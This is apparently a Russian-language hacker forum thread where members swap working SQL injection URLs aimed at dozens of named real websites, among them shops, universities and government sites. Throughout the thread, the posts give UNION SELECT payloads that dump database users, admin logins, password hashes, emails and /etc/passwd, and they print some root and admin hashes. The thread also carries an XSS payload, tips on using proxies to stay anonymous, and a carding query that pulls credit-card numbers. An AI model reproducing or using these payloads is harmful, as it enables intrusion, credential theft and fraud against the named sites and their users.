http://www.xmlhack.com/read.php?item=-1+union+select+1,table_name,3,4,5,6,7,8,9,10,11+fr om+information_schema.tables/*
таблицы юзеров нет =\ обидно..

http://www.britishcat.ru/articles.html?Action=ShowArticle&Article=-1+union+select+1,2,version(),4,5/*
коськи =))))))

http://kahani.com/current.php?id=-6+union+select+1,convert(version()+using+latin1),3 ,4,5,6

http://kahani.com/current.php?id=-6+union+select+1,convert(version()+using+latin1),3 ,4,5,6

вот так повкуснее будет

http://kahani.com/current.php?id=-6+union+select+1,convert(concat(user,char(58),pass word)+using+latin1),3,4,5,6+from+mysql.user/*

root:1386b54e67928d79

http://www.themarchives.com/showproject.php?ID=-5+union+select+1,convert(version()+using+latin1),3 ,4,5/*

http://www.aiap.it/news.php?ID=-864%20UNION%20SELECT%201,database(),3,4,5,6,7,8/*


http://www.top-ix.org/standard.php?id=-59%20UNION%20SELECT%201,2,3,4,5,user,7+from+mysql. user/*


http://www.buhgalteria.com.ua/Hit.html?id=-1+union+select+1,2,3,4,5,6,7,convert(password%20us ing%20cp1251)%20+from+mysql.user/*

http://www.joshuaproject.net/scalelist.php?scalevalue=-1.2+union+select+null,version(),null,null,null,nul l,null,null,null,null,null,null,null/*

15 колонок, Mysql3:

__http://www.kennisalliantie.nl/index.php?id=3+group+by+16/*

http://www.sabeel.org/etemplate.php?id=-13+union+select+1,2,3,4,version(),6,7,8,9,10,11,12 ,13

Нашёл уязвимость:
http://localhost/index.php?f=1&s=1'
Как можно шелик влить =)
При нажатии на сцылку выдаёт ошибку следующего рода:

Parse error: parse error, unexpected T_CONSTANT_ENCAPSED_STRING, expecting ']' in с:\appserv\www\index.php(497) : runtime-created function on line 1

Warning: usort() [function.usort]: Invalid comparison function. in c:\appserv\www\index.php on line 497

?


:(

http://www.brodyweiser.com/aboutus_detail.php?id=-13+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*

:(
А пример можно?
Так невыходит:
http://h44.lan248.rs/index.php?f=1&s=1'id=-13+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
:mad:

это был не пример :( просто ты помоему незнаеш назначения sql inj или путаеш его с php inj
http://www.funisland.com/gamelist.php?id=-13+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*

Объяните пожайлуста, зачем ломать русские сайты??

Просьба к модераторам, выложить здесь ники со следующими Ip:


[censored!]

PS. Если ломаете, то хотя бы думайте головой, а не задницей.

_http://www.caucaz.com/home_eng/breve_contenu.php?id=1+union+select+1,version(),3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29/*

Вывод второго поля смотрим внизу, слева над WRITTEN BY

Вас проверяли на основы анонимной работы в сети.
Сегодня это были наши мемберы, а завтра это могут быть ребята из органов.

Делаем выводы.

Под реальными айпи замечены: Ksander,Colkru,\6/

ЗЫ: бага, сервак и логи - настоящие. И проблемы у Вас ещё могут быть.

http://www.bridgewater.edu/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9+admins/*
http://www.bridgewater.edu/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9+users/*

поля так и несмог подобрать(


http://mrce.wustl.edu/index.php?id=dynamic_page&itemid=7+union+select+null,null,null--

кто заняет как обойти несоответствие

http://mrce.wustl.edu/index.php?id=dynamic_page&itemid=7+union+select+1,2,3--
ERROR: UNION types character varying and integer cannot be matched

VampiRUS
по идее convert(version(),char)

Все топики не смотрел, так что если уже есть, сорри. Привет первонаху _http://www.gay-nn.ru/?aquery=news&id=-106+UNION+SELECT+1,2,3,4,5,6,7,8/* =)

2VampiRUS
http://www.bridgewater.edu/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9+admins/*
http://www.bridgewater.edu/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9+users/*

да ты и таблицы не подобрал)) нужно union+select+*+from+table_name/*

вот -

http://www.bridgewater.edu/index.php?id=-1+union+select+1,2,3,4,5,6,concat(username,0x3a,pa ssword),8,9,10,11,12,13,14,15,16,17,18,19+from+use rs/*

зы 16 юзеров, перебирать limit'ом :)

www.loga.gov.ua
http://www.loga.gov.ua/ua/news/todrug.php?id=-8809+union+select+concat(password,0x3a,user)+from+ mysql.user/*

там PostgreSQL
вот тебе циферка
http://mrce.wustl.edu/index.php?id=dynamic_page&itemid=-7+union+select+null,null,to_char(1,123)--

хм
http://artmuseum.kaluga.ru/print.php?cont=expo_info&id_edit=-1+union+select+1,2,concat(user,0x3a,password)+from +mysql.user/*
http://artmuseum.kaluga.ru/print.php?cont=expo_info&id_edit=-1+union+select+1,2,load_file('/etc/passwd')+from+mysql.user/*

http://www.bathtubmusic.com/album.php?id=-1+union+select+1,2,version(),4/*

Люблю когда все так четко)

http://www.rif.bz/index.php?m=catalog&cat_con=-1+union+select+1,2,3,convert(version(),char),5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
http://www.rif.bz/index.php?m=catalog&cat_con=-1+union+select+1,2,3,convert(table_name,char),5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+ information_schema.tables/*
http://www.rif.bz/index.php?m=catalog&cat_con=-1+union+select+1,2,3,convert(column_name,char),5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from +information_schema.columns+where+table_name="SiteUser"/*
http://www.rif.bz/index.php?m=catalog&cat_con=-1+union+select+1,2,3,convert(concat(user_id,char(5 8),user_login,char(58),user_pass,char(58),user_nam e),char),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22+from+SiteUser/*

немного отойдя от шока продолжу своё неблагодарное дело =(




http://sex.dp.ua/topic.php?categor=-1+union+select+1,concat(login,char(58),password),3 ,4+from+users+limit+0,1/*

http://www.imhoclub.ru/books/?did=-1+union+select+1,concat(database(),char(58),user() ,char(58),version())/*

http://www.ugweekend.ru/index.php?mag=07&nid=-1+union+select+1,2,concat(database(),char(58),user (),char(58),version())/*

http://www.trizway.com/seminar.php?id=-1+union+select+1,2,3,4,5,6,7,convert(concat(databa se(),char(58),user(),char(58),version()),char),9,1 0,11/*
http://www.trizway.com/seminar.php?id=-1+union+select+1,2,3,4,5,6,7,convert(email,char),9 ,10,11+from+author/*

http://mrce.wustl.edu/index.php?id=dynamic_page&itemid=7+union+select+1,2,3--
ERROR: UNION types character varying and integer cannot be matched
http://mrce.wustl.edu/index.php?id=dynamic_page&itemid=-40+union+select+null,TABLE_NAME,null+FROM+INFORMAT ION_SCHEMA.TABLES--
но хз как перебирать :(

mssql
http://www.opentext.com/news/pr.html?id=1772+or+1772=@@version--

http://www.sumtotalsystems.com/success/login_global.html?id=-1+union+select+1,2,3,4,5,6,7,8,9+from+regusers/*

http://www.spoono.com/photoshop/tutorials/tutorial.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5, 6,7,8,9,10+from+users+limit+0,1/*
юзеров 6, смотрим в тайтл.
md5 вроде


upd://
http://www.yuldash.com/tg/index.php?id=-1+union+select+version(),2,3,4,5,6,7/*&q=mes&pp=7

Хотабыч
запрос должен выглядеть примерно так
http://mrce.wustl.edu/index.php?id=dynamic_page&itemid=-40+union+select+null,TABLE_NAME,null+FROM+INFORMAT ION_SCHEMA.TABLES+limit+1+offset+2--

Заюзал соксы и начал наверствовать упущеное :D :


http://pravoslavie.info/stat.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10/*
____

http://www.cinefantastico.com/filmct.php?id=-1+union+select+1,2,3/*
____
Softholm.com - 2500 посетителей в день

http://www.softholm.com/php/dd.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13/*
___

:)

http://www.cipmarseille.com/evenement_fiche.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13,14/*
Всё я спать)

Так и не подобрал таблицу с юзверями(

http://www.yukka.ru/detail.php?id=7&pid=-1+union+select+1,convert(concat(database(),char(58 ),user(),char(58),version()),char),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22/*

Таблицы не нашел :(
http://www.lygus.lt./ITC/news.php?id=-1+union+select+1,user(),3,version(),database()/*

http://www.allaboutjazz.com/
http://www.allaboutjazz.com/php/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,user( ),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37,version(),39,40,41,42,43,44,4 5,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61, 62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77/*

http://www.caiguoqiang.com/
http://www.caiguoqiang.com/project_detail.php?id=-1+union+select+1,2,3,4,5,user(),7,8,9,10,version() ,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*

В очередной раз первая скуль...надеюсь эти никто не выкладывал?)

http://www.tomkeays.com/morris/faq/?mid=380000000%20union%20select%201,email,password ,4,5,6,7,8,9,10,11,12,13,14%20from%20user/*

http://www.tomkeays.com/morris/faq/?srch=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E

www.allaboutjazz.com
я выкладывал вроде как =)
http://www.protei.ru/eng/products.php?sid=2&id=-2+union+select+1,password+from+users

http://www.losingtoday.com/tales.php?id=-1+union+select+1,2,3,version(),5,6/*

___

193 колонки :D , ппц:

http://shapes.aim-at-shape.net/view.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,4 6,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62, 63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79 ,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,9 6,97,98,99,100,101,102,103,104,105,106,107,108,109 ,110,111,112,113,114,115,116,117,118,119,120,121,1 22,123,124,125,126,127,128,129,130,131,132,133,134 ,135,136,137,138,139,140,141,142,143,144,145,146,1 47,148,149,150,151,152,153,154,155,156,157,158,159 ,160,161,162,163,164,165,166,167,168,169,170,171,1 72,173,174,175,176,177,178,179,180,181,182,183,184 ,185,186,187,188,189,190,191,192,193/*

http://career.coe.missouri.edu/index.php?page=-1+union+select+1,2,convert(USER()+using+latin1),4, 5,6,7,8,9,0,1/*

Перехожу на чтото более безопасное, на шопы например =)


http://best4her.net/shop.php?goods=-1+union+select+1,2,3,convert(version(),char),5,6,7 ,8,9,10,11,12/*

Вот еще один, так же трабла =( 4 версия, названий 30 перебрал и ничего =(.

http://blueshop.ru/details.php?product_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23/*

http://www.sra.org/opportunities_detail.php?id=-1+union+select+1,2,3,convert(concat(user,char(58), password)+using+latin1),5,6,7,8+from+mysql.user+li mit+0,1/*

root:6ae787f828f13555
________

http://www.actionscript.org/showMovie.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20/*


На форуме 52,878 юзеров зарегано)))А на данный момент(время редактирования поста) находится на форуме 522 человек)))
_______
Microchip.by:

http://www.microchip.by/info.php?id=-1+union+select+1,2,3,version(),5/*

2 Ksander
там может и нет таблицы юзеров... ведь корзина, судя по всему, кукисы юзает, а не авторизацию.. да и админки я там не видел.
вот аналогичный случай:
http://www.fightbeat.com/article_detail.php?AT=-1+union+select+1,2,3,4,5,6,7,8/*

http://zona.bloudil.cz/index.php?id=-1+union+select+1,2,3,4,5,version(),7,8,9/*

Странное колличество колонок:
http://www.travelonline.ru/act.php?pg=shop_razdel&cat2=5&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
"странное" в плане чего? 8о
Вывод в тайтле если что ;)

http://emotive.ru/shop/index.php?CID=-1+union+select+1,version()+from+admin/*

http://www.intellectpro.ru/news/index.php?oper=view&news_id=-1+union+select+1,table_name,3+from+information_sch ema.tables/*
там 350+-50 таблиц, лично мне просматривать все лень :)
перебрал 50 шт. и забил)

http://www.selfserviceworld.com/article.php?id=-1+union+select+1,password,3,4,5,6,7,8+from+mysql.u ser/*

http://www.antipatriarcat.org/cmcs/titre.php?id=-1+union+select+1,2,3,4,5,6/*

http://www.onlife.ru/drink.phtml?id=-1+union+select+concat(database(),char(58),user(),c har(58),version())/*

Нашел таблицу с юзверями и админами, а вот имена колонок подобрать не смог:

http://www.rozvaga.com/kino.php?id=-1+union+select+1,2,3,4,5,6,concat(database(),char( 58),user(),char(58),version()),8,9,10,11,12,13,14, 15,16/*
http://www.rozvaga.com/kino.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16+rozvaga_user/*
http://www.rozvaga.com/kino.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16+rozvaga_admin/*

http://www.chem.uci.edu/employment/display.employment.faculty.php?id=-6+union+select+1,2,password+from+mysql.user/*

http://artsci.wustl.edu/~acsp/faculty.php?action=person&id=-65+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18/*

http://www.nsu.ru/psych/business/publication.php?id=-75+union+select+1,2,VERSION(),4,5,6/*

http://www.losingtoday.com/tales.php?id=-132+union+select+1,2,3,4,5,6/*

http://www.best-ipoteka.ru/tales.php?id=-132+union+select+1,2,3,4/*

Аллах акбар!

www.islam.ru

http://www.islam.ru/shop/index.php?cat=46&good=-1+union+select+1,convert(version(),char),3,4,5+fro m+users/*

Кто себе новый комп хочет ?=)

http://notes.asdplus.ru/shop/showbrand.php?brand=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,log,18,19,20+from+users+limit+6,1/*


Тут прикупить книжки и диски для компа =)

http://www.saranagati.net/shop/index.php?p=list&cid=-1+union+select+concat(login,char(58),password)+fro m+users/*



p.s.у меня чето все скули по темам идут =)

http://studybank.info/viewdetails.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(u sername,char(58),passwd),14+from+user+limit+0,1/*

Пассы в чистом виде)

Чтобы как то компенсировать казус с мейлом вот:

http://hotel.travel.rambler.ru

Правда там mssql

http://hotel.travel.rambler.ru/vitrina.asp?sDescr=-1

так чтоли ?

http://hotel.travel.rambler.ru/vitrina.asp?sDescr=-1+union+all+select+1 bla bla bla---

А вот и мой ШОП :D :D :D :

http://www.pikanteria.pl/towar.php?poz=subtelny&gr=sexi%20stroje&podgr=sukienki&id=-1+union+select+1,2,3,4,5,6,concat(user,char(58),pa ss),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26+from+users/*

Те кто хочет себе косметику сюда =)

marykay.freshop.ru

Табл.запарился подбирать.
http://marykay.freshop.ru/good.php?id=-1+union+select+1,version(),3,4,5,6,7,8/*

http://www.aidan-gallery.ru/cgi/wgal.cgi?gid=1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16+FROM+users/*
фух устал, скока же вас там %)
а на есламе - в таблице юзверс две записи, поле с логином.. гадал долго, nick! =) password,email,id
куда их вводить хз, и пассы не шифрованые даже... от форума не совпали от админа, там бб какойто

http://www.metro.waw.pl/page.php?id=+1+union+select+database(),user()/*



http://www.arclub-nsk.ru/dynamic.html?sec=-4&id=-1+union+select+1,database(),3,4/*


http://www.ohota-ribalka.com.ua/rehunt_1.htm?id=- 1+union+select+1,user,3,password,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,2
2,23,24,25,26,27,28,29,30+from+mysql.user/*

http://www.moottoriliitto.fi/page.php?id=10+union+select+password+from+mysql.us er+limit+1,1/*&type=muutsivut&page=6

http://www.promservice.com/index.php?page=news&lang=ru&id=-1+union+select+1,2,concat(e_mail,0x3a),4+from+user s/*

http://www.buhgalteria.com.ua/Hit.html?id=-1+union+select+1,2,3,4,5,6,7,convert(concat(user,0 x3a,password)%20using%20cp1251)%20+from+mysql.user/*

http://basic.forumservice.nl/lees.php?id=1&mid=-41+union+select+1,2,3,4,concat(password,0x3a,user) ,6,7,8+from+mysql.user/

http://www.domkino.spb.ru/description.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17+from+user/

Монголия хекд!

www.president.mn

http://www.president.mn/show_module.php?index=dayinfo&dayinfoid=-1+union+select+1,concat(username,char(58),password ),3,4,5,6,7,8,9,10,11,12,13,14+from+user+limit+0,1/*








p.s.from+prgp_category_m/*

Как удалось табл.подобрать ? Оо

http://www.mobu.ru/download.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*
регистрации вроде нет, доступ в админку через .htaccess :) но все же)
http://www.hushpuppies.ru/cat_item.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5+ from+mysql.user/*
root:*9B56E42584D2F6F2CCF6039BA43F1039CAAD7C97 :)
mysql5
http://shop.turistua.com/index.php?x_id=-1+union+select+version()/*
это просто так :p

http://shop.turistua.com/index.php?x_id=-1+union+select+version()/*
это просто так :p

мм http://shop.turistua.com/index.php?x_id=-1+union+select+concat(name,char(58),user())+from+a dmin/*

мм http://shop.turistua.com/index.php?x_id=-1+union+select+concat(name,char(58),user())+from+a dmin/*
:D
молодец, я как-то пропустил))
все гениальное - просто)
не как моя следующая инъекция)) пришлось качать smf, чтоб посмотреть названия колонок и таблиц в install.sql
http://www.dsrevolution.com/article.php?articleid=-1+union+select+1,2,3,4,5,6,7,concat(memberName,0x3 a,passwd,0x3a,emailAddress),9,10,11,12,13,14+from+ smf_members+limit+0,1/*
860±10 мемберов
login:рass:mail

Какой то магазинчик, вытянул мыло и пароль, собственно там это и нужно:


http://dvd.multi-m.ru/category/details.php?Id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(e mail,char(58),pwd),14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28+from+users/*

http://buks.ru/book/?id=-1+union+select+1,2,concat(database(),char(58),user (),char(58),version()),4,5,6,7,8,9,10,11,12,13,14, 15,16,17/*

Не забываем пользоваться проксями!

А ктото в казино играть любит? =)

Люблю v4 зато что большая вероятность таблици user\users\admin\admins, но терпеть немогу её за то, что если эти таблици не подходят подобрать сложно, люблю v5 зато что можно с большой вероятностью вычислить нужную таблицу, но нелюблю её за такой гемор. =)



http://www.casinoratgeber.com/index.php?bid=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18/*

А еще лицей информационных технологий....
Куда катимся?...


http://www.lit.dp.ua/?rid=-1+union+select+1,2,3,4,5,6/*&cont=news

http://www.hrmi.lt/news.php?strid=1010&id=-4039+union+select+1,password,username,4,5,6,7,8,9+ from+users/*
admin:9a997d8da071c76edc7aa3e9a89b251d

http://www.galiugyventi.lt/news.php?strid=1034&id=-1+union+select+1,password,username,4,5,6,7,8,9,0,1 ,2,3,4+from+users/*
он же :)
admin:9a997d8da071c76edc7aa3e9a89b251d

http://www.apahelpcenter.org/featuredtopics/feature.php?id=-6+union+select+1,2,3,concat(username,0x3a,password ),5,6,7+from+users/*

может это уже было?

http://www.stroy-shop.ru/index.php?akus=11&link_id=11&pref=3&id=-9+union+select+1,2,3,version(),5,6,7,8,9/*=\

http://www.apahelpcenter.org/featuredtopics/feature.php?id=-6+union+select+1,2,3,concat(username,0x3a,password ),5,6,7+from+users/*

может это уже было?
Было, и не раз.
____________
Скули:
Какойто магазин:

http://www.quintensmedia.com/SHOP/category.php?ID=-1+union+select+1,2,3,version()/*

Колготки и чулки :D :
http://peppi-shop.ru/shop.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20/*

И еще один шоп с 5-ой скулей))):
http://apex.vtc.com/display-cds.php?id=-1+union+select+1,2,3,4+from+members/*

http://c82.net/article.php?ID=24%20union%20select%201,2,3,4/*

http://www.michaelpollan.com/article.php?id=-80%20union%20select%201,2,3,4,5,6,7,8,9,0/*

http://www.fondsk.ru/article.php?id=-536%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21/*

http://www.soaw.org/new/pressrelease.php?id=-130%20union%20select%201,id,concat(email,char(58), phone),4,5,6,7,8,9,10,11,12,13%20from%20groups/*

http://palestra.pucp.edu.pe/index.php?id=-225%20union%20select%201,password,3,4,5,6,7,8,9,0, 11,12,13,14,15,16,17%20from%20users/*

http://www.dukemednews.org/news/healthtip.php?id=-6430%20union%20select%20concat(user,char(58),passw ord),2,3,4,5,6,7,8,9,0,0%20from%20mysql.user/*

http://magericmed.ru/modules/articles/article.php?id=29%20union%20select%201,2,3,4,5,6,A ES_DECRYPT(AES_ENCRYPT(concat(user,char(58),passwo rd),0),0),8,9,0,1,2,3,4,5,6,7,8,9,0%20from%20mysql .user/*
_:)_

Монголия хекд!

www.president.mn

http://www.president.mn/show_module.php?index=dayinfo&dayinfoid=-1+union+select+1,concat(username,char(58),password ),3,4,5,6,7,8,9,10,11,12,13,14+from+user+limit+0,1/*


p.s.

Как удалось табл.подобрать ? Оо

я ужо постил), тут кажись некоторые ссылки раз по 5 повторяются, если не больше.


http://www.jobs.ge/index.php?ur=job&id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,USER(),4,5, 6,7,8/*

http://www.dailycal.org/sharticle.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17/*

http://www.stroyrt.ru/index.php?page=news&newsid=-1+union+select+1,concat(login,char(58),passwd),3,4 +from+users+limit+1,1/*

http://www.dailycal.org/sharticle.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17/*


http://www.dailycal.org/sharticle.php?id=-1+union+select+1,2,3,4,convert(соncat(user,сhа r(58),pаsswоrd),char),6,7,8,9,10,11,12,13,14,15, 16,17+from+mysql.user/*

:p моё кунг фу сильнее твоего =)

http://www.dailycal.org/admin/ нет доступа =(

http://www.kvalitet.com.ua/shop/new.php?ID=-36%20UNION%20SELECT%201,2,3,4+from+news/*

http://www.lucaffeshop.cz/kategorie/index.php?id=-1504+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64 ,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,8 1,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97, 98,99,100,101,102/*
выборка с таблицы users возможна
и это еще не конец((

http://www.lucaffeshop.cz/kategorie/index.php?id=-1504+union+select+1,2,3-вылетает
коммент (You have an error in your SQL syntax; check the manual .......) че за нах?

college.ru
http://www.college.ru/modules.php?name=Teacher&param=viewlink&cid=-1+union+select+1,2,3,4,5/*
не смог подобрать таблицу юзеров) версия 4, фильтация скобок в запросах...(

http://www.voinenet.ru/index.php?aid=-1'+union+select+1,2,3,4,5,table_name,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+fro m+information_schema.tables/*
к mysql.user доступа нет.
зато версия 5 :)

http://www.mks-ks.ru/shop/cat.php?id=-4+union+select+1,2,3,convert(version()+using+cp125 1)/*

все ценим мою скулю
знаков много, будут пробелы.
http://www.m16.ru/shop/index.php?page=model&id=-30+union+select+1,char(241,243,239,229,240,45,236, 229,227,224,32,234,240,243,242,238,233,32,237,238, 243,242),3,char(40,236,238,228,229,235,252,32,92,3 4,243,240,243,240,243,92,34,41),5,6,char(237,232,2 32,239,224,246,224,32,241,234,238,235,252,234,238, 32),8,9,char(205,238,226,224,255,32,236,238,228,22 9,235,252,32,241,243,239,229,240,45,236,229,227,22 4,32,234,240,243,242,238,227,238,32,237,238,243,24 2,224,32,211,208,211,208,211,32,239,238,236,238,23 0,229,242,32,226,224,236,32,226,32,242,224,234,238 ,236,32,237,229,235,184,227,234,238,236,32,228,229 ,235,229,32,234,224,234,32,213,221,202,46,32,206,2 42,235,232,247,232,242,232,235,252,237,238,32,238, 241,238,225,229,237,237,238,241,242,252,254,32,228 ,224,237,237,238,233,32,236,238,228,229,235,232,32 ,255,226,235,255,229,242,241,255,32,236,232,245,22 4,237,232,231,236,32,240,224,231,225,232,226,224,2 37,232,255,32,234,224,236,237,229,233,32,232,32,22 6,251,231,238,226,32,232,231,32,227,235,243,225,23 2,237,32,238,234,229,224,237,224,32,241,224,236,23 8,227,238,32,202,242,243,235,245,243),char(208,250 ,235,252,255,245),150,5,char(237,232,234,224,234,2 38,227,238,32,237,224,245,229,240,32,239,240,238,2 46,229,241,241,238,240,224),char(237,232,234,224,2 34,238,227,238,32,237,224,245,229,240,32,239,240,2 38,246,229,241,241,238,240,224),char(245,231),char (51,50,32,234,225),0,char(207,238,228,228,229,240, 230,234,224,32,240,224,231,240,229,248,229,237,232 ,255,32,49,120,49,32,112,105,99,115),50000,char(23 7,232,245,240,229,237,224,32,238,237,32,237,229,32 ,247,232,242,224,229,242),char(237,229,242),char(2 36,238,228,229,236,32,241,238,32,241,234,238,240,2 38,241,242,252,254,32,57,57,57,32,71,98,105,116,47 ,115),char(237,232,245,240,229,237,224,32,238,237, 32,237,229,32,247,232,242,224,229,242),0,1400000,c har(239,238,230,232,231,229,237,237,238,32,237,224 ,245),char(77,83,45,68,79,83),char(239,224,235,252 ,247,229,234,238,226,224,255),char(221,242,238,242 ,32,237,238,243,242,225,243,234,32,226,251,32,236, 238,230,229,242,229,32,234,243,239,232,242,252,32, 243,32,83,112,121,100,101,114,92,39,97,46,32,65,78 ,84,73,67,72,65,84,32,82,117,108,101,115,33,33,33)

www.keckobservatory.org


Колонку не подобрал =(
http://www.keckobservatory.org/article.php?id=-1+union+select+1,convert(version(),char),3,4,5,6,7 ,8+from+mysql.user/*

www.keckobservatory.org


Колонку не подобрал =(
http://www.keckobservatory.org/article.php?id=-1+union+select+1,convert(version(),char),3,4,5,6,7 ,8+from+mysql.user/*

http://www.keckobservatory.org/article.php?id=-1+union+select+1,convert(concat(user,char(58),pass word),char),3,4,5,6,7,8+from+mysql.user+limit+0,1/*

Элементарно, правда пасса нет((

http://www.keckobservatory.org/article.php?id=-98%20union%20select%201,LOAD_FILE(0x2f6574632f7061 73737764),3,4,5,6,7,8/*

Пожалуйста :)

З.ы Spyder - жжошь... правда последний char в адресную строку не поместился.

что-то я седня не в форме :)
http://www.pouet.net/prod.php?which=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from +users/*
колонки опять не подобрал........... ппц (
версия 5.

n1†R0x

http://www.pouet.net/prod.php?which=-1+union+select+1,2,3,4,5,6,column_name,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30+from%20information_schema.columns%20where%20 table_name=char(117,115,101,114,115)%20limit%201,2/*

Колонки то есть, но вот колонку с паролем не нашел ))

www.casinoratgeber.com

Переходим на казино =)
http://www.casinoratgeber.com/index.php?bid=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18/*

n1†R0x



Колонки то есть, но вот колонку с паролем не нашел ))
аналогично)
ps:
http://www.ipspackaging.com/packaging.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27/*
ничего стандартное не подошло :(

Еще скули:


http://itjob.dp.ua/search.php3?whatlooking=vacancies&searchtype=browse&category=9'
Кол-во полей так и не подобрал(( При 16 ошибок 2 в других случаях 1

http://itjob.dp.ua/product.php3?product=-1 union select 1,2,user(),4,5,6,7/*
http://itjob.dp.ua/product.php3?product=-1 union select 1,2,user(),4,5,6/*
Работает и та и та, ток выводит в разных местах)

Еще скули:



Не трогать, она моя ща доделаю =)


Вот, щас колонки пробью.

http://itjob.dp.ua/product.php3?product=-1+union+select+1,2,3,4,5,6,7+from+auth/*

http://itjob.dp.ua/product.php3?product=-1+union+select+1,2,name,4,5,6,7+from+auth/*

Пасс чет не идет =(

http://www.harsky.ru/index.php?type=6&act=Article&id=-11+union+select+1,CONCAT_WS(char(58),version(),use r(),database()),3,4,5,6,7,8,9,10,11
http://volvo-faq.auto.ru/flame/bookmark/view_group.php?id=-8+union+select+1,2,CONCAT_WS(char(58),version(),us er(),database()),4,5,6,7,8
=\
CONCAT_WS рулит =\

http://bookashop.ru/book/?book=-1+union+select+1,2,concat(database(),char(58),user (),char(58),version()),4,5,6,7,8,9,10,11,12,13,14/*

Grey, проще использовать функцию CONCAT_WS(разделитель,строка1,с� �рока2,...)

чем проще?

Spyder, согласен. Но в случае с выводом всего двух столбцов разницы имхо никакой)
так что:
red-tape.org
http://www.red-tape.org/initiatives.php?id=-1+union+select+1,concat(email,0x3a,password),3,4,5 ,6,7,8,9,10,11+from+ld_users+limit+0,1/*
около 1400 юзеров
пассы в md5
email:рass

Вот, добил itjob.dp.ua:

http://itjob.dp.ua/product.php3?product=-1 union select 1,2,concat(id,char(58),login,char(58),passw,char(5 8),name),4,5,6 from auth/*


Вот он, админчег:

1:admin:ee550a634df47433c1f0caf2ef867c4d:Yuriy S.

[ cash ], ты наркоман что ле или просто не знаешь что делает эта функция?
давай представим стандартный кардерский запрос c функцией concat()
select+1,concat(id,char(58),email,char(58),ccn,cha r(58),name,......),3
не проще ли сказать с помощью функцией CONCAT_WS()
select+1,concat_ws(char(58),id,email,ccn,name,...) ,3

Если ты просто не знаешь что она делает то эта функция в учебнике выглядит так CONCAT_WS(разделитель,строка1,с� �рока2,строка3)
Когда объеденяется 2 или 3 столбца то это конечно не нужно, но при больших запросах, где надо вывести много инфы лучше использовать эту функцию =)

